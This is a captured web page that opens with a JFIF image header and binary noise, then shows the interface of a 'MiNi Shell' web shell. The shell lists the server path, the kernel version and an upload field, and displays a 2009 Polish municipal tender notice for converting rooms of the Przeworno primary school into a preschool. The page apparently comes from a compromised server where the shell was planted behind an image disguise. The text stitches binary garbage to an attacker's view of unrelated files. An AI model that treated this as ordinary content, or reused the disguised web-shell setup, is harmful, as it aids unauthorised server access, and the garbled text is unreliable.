JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090227/43836-N-2009.html

<p class="kh_header"><b>Przeworno: Przebudowa części pomieszczeń Szkoły Podstawowej w Przewornie położonych przy ulicy Kolejowej 4D, działka nr 158/7 AM-4</b><br>
<b>Numer ogłoszenia: 43836 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przeworno , ul. Kolejowa 4a, 57-130 Przeworno, woj. dolnośląskie, tel. 074 8102052, 8101311, faks 074 8102002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przeworno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa części pomieszczeń Szkoły Podstawowej w Przewornie położonych przy ulicy Kolejowej 4D, działka nr 158/7 AM-4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przebudowa i wyposażenie części pomieszczeń Szkoły Podstawowej w Przewornie w celu utworzenia Gminnego Przedszkola Publicznego, położonego przy ulicy Kolejowej 4 D, działka nr 158/7 AM-4

2. Zakres zamówienia

Wykorzystując istniejący układ pomieszczeń zaprojektowano:

 Przedszkole 2-oddziałowe na parterze
- powierzchnia użytkowa-					218.30 m2

Program użytkowy:

- 2 szatnie - 21,50 m2
- 2 sale zajęć- 103,27 m2
- 2 zespoły sanitarne- 29,33 m2
- hall wejściowy
- korytarz - 28.20 m2

- 2 SZATNIE

 Szatnia dzieci jest pomieszczeniem, w którym poza przechowywaniem ubrania dzieci opanowują umiejętność samodzielnego ubierania się. Szatnie zaprojektowano tworząc odrębne boksy dla każdego oddziału. Szatnia zostały zlokalizowana na parterze w    bezpośrednim sąsiedztwie wejścia i hallu.
Szatnia I							10.23 m2
Szatnia II					             11.27 m2

- 2 SALE ZAJĘĆ

Sale zajęć przeznaczone są dla realizacji zadań wychowawczo-dydaktycznych, zabaw, spożywania posiłków oraz wypoczynku. Sala zajęć z zespołem sanitarnym, schowkiem porządkowym stanowi kompleks pomieszczeń dla jednego oddziału. 
 - sala przedszkolna I				49.24 m2
 - sala przedszkolna II				54.03 m2

- 2 ZESPOŁY SANITARNE

Zespoły sanitarne dzieci zaprojektowano odrębne dla każdego oddziału. Zespół sanitarny zlokalizowano w bezpośrednim sąsiedztwie sali zajęć. W zespole przewidziano:
   -2 miski ustępowe o zmniejszonych wymiarach
   -3 umywalki o zmniejszonych wymiarach
   Miski ustępowe należy obudować ściankami do wysokości 1,30 m. Kabiny powinny być zamykane drzwiczkami dwuskrzydłowymi o wysokości umożliwiającej wgląd personelu opiekuńczego. Wysokość zawieszenia umywalek należy uzależnić od przewidywanego wzrostu dzieci.
- umywalnia I					6.16 m2
-w.c. I						8.54 m2
-umywalnia II					6.09 m2
-w.c. II						8.54 m2

Schowki porządkowe służą do przechowywania środków do utrzymania czystości w zespole pomieszczeń użytkowanych przez poszczególne oddziały. Powinny być wyposażone w zlew umieszczony na wysokości 45 cm nad podłogą oraz w zawór czerpalny ze złączką do węża. Schowki należy lokalizować przy pomieszczeniach sanitarnych oraz zabezpieczyć przed dostępem dzieci. Projektowane przedszkole będzie korzystać z istniejących schowków porządkowych szkoły

- HALL WEJŚCIOWY

Hall -poczekalnia dla rodziców jest miejscem ogólnego badania stanu zdrowia dziecka przy jego przyjściu do przedszkola, służy rodzicom do rozbierania dzieci z odzieży wierzchniej oraz do oczekiwania na dziecko po skończeniu zajęć.

- KORYTARZ 

- Korytarz					28.20 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.27.00-8, 45.26.28.00-9, 45.40.00.00-1, 45.26.25.21-9, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 4 925,84 zł powinno być wniesione w formach określonych w art. 45 ust. 6 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają następujące warunki:
1.1.spełniają warunki o których mowa w art. 22 ust. 1 pkt. 1-3 ustawy Prawo zamówień publicznych, tj.:
1.1.1.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
Na potwierdzenie spełniania tego warunku w ofercie należy przedłożyć: 
1) polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
2) zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków,
3) zaświadczenie właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne
1.1.2.dysponują odpowiednim doświadczeniem zawodowym
1) Wykonawca musi wykazać, że w okresie ostatnich 5 lat wykonał roboty odpowiadające swoim rodzajem przedmiotowi zamówienia, tj. roboty ogólnobudowlane wraz z instalacjami wewnętrznymi w obiektach o łącznej wartości min. 200.000 zł
2) Na potwierdzenie spełniania tego warunku, w ofercie należy przedstawić informację o doświadczeniu Wykonawcy - na formularzu zgodnym z treścią załącznika Nr 5 do SIWZ oraz dokumenty potwierdzające wykonanie wykazanych robót z należytą starannością.
1.1.3.dysponują odpowiednio wykwalifikowanym personelem
1) Wykonawca musi dysponować min. 1 osobą przewidzianą do kierowania robotami, posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej w zakresie obiektów budowlanych budownictwa ogólnego.
2) Na potwierdzenie spełniania tego warunku wraz z ofertą należy przedłożyć:
a) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą
    uczestniczyć w wykonaniu zamówienia - na formularzu zgodnym z treścią 
    załącznika Nr 4 do SIWZ;
b) dokumenty potwierdzające uprawnienia osób przewidzianych do kierowania 
    robotami wraz z aktualnymi zaświadczeniami z właściwej Izby Inżynierów 
    Budownictwa;
c) pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
    wykonania zamówienia, jeżeli Wykonawca wskazał osoby, którymi będzie   
    dysponował
1.2.nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.

2.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach 
i oświadczeniach przedstawionych w ofercie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełnienia warunków, o których mowa w rozdz. VI, Wykonawcy winni przedstawić następujące dokumenty  i oświadczenia:

1.1.Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt. 1-3 ustawy Prawo zamówień publicznych zgodnie z treścią załącznika nr 2 do niniejszej SIWZ.
1.2.Oświadczenie o nie podleganiu wykluczeniu z  postępowania na podstawie art. 24 ust. 1 i 2  ustawy Prawo zamówień publicznych, zgodnie z treścią załącznika nr 3 do niniejszej SIWZ.
1.3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert.
1.4.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert.
1.5.Aktualne zaświadczenie właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert.
1.6.Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
1.7.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia - na formularzu zgodnym z treścią załącznika Nr 4 do niniejszej SIWZ
1.8.Dokumenty stwierdzające uprawnienia osób przewidzianych do kierowania robotami wraz z zaświadczeniem z właściwej Izby Inżynierów Budownictwa.
1.9.Zobowiązanie pisemne innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w załączonym wykazie Wykonawca wskazał osoby, którymi będzie dysponował.
1.10.Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
i wartością  robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, zgodnie z treścią załącznika nr 5 - Doświadczenie, do  niniejszej SIWZ.
1.11.Dokumenty potwierdzające, że wykazane roboty zostały wykonane z należytą starannością.
2.Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez wykonawcę.
Jeżeli złożona przez wykonawcę kopia dokumentu będzie nieczytelna lub będzie budziła wątpliwości, co do jej prawdziwości, Zamawiający może żądać przedstawienia oryginałów lub notarialnie poświadczonej kopii dokumentu.
3.Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniające rozporządzenie 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 188 poz. 1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przeworno.pl w zakładce przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: Gmina Przeworno, ul. Kolejowa 4 A, 57-130 Przeworno, pok. nr 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: siedziba Zamawiajacego: Gmina Przeworno, ul. Kolejowa 4 A, 57-130 Przeworno, sekretariat, pok. nr 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com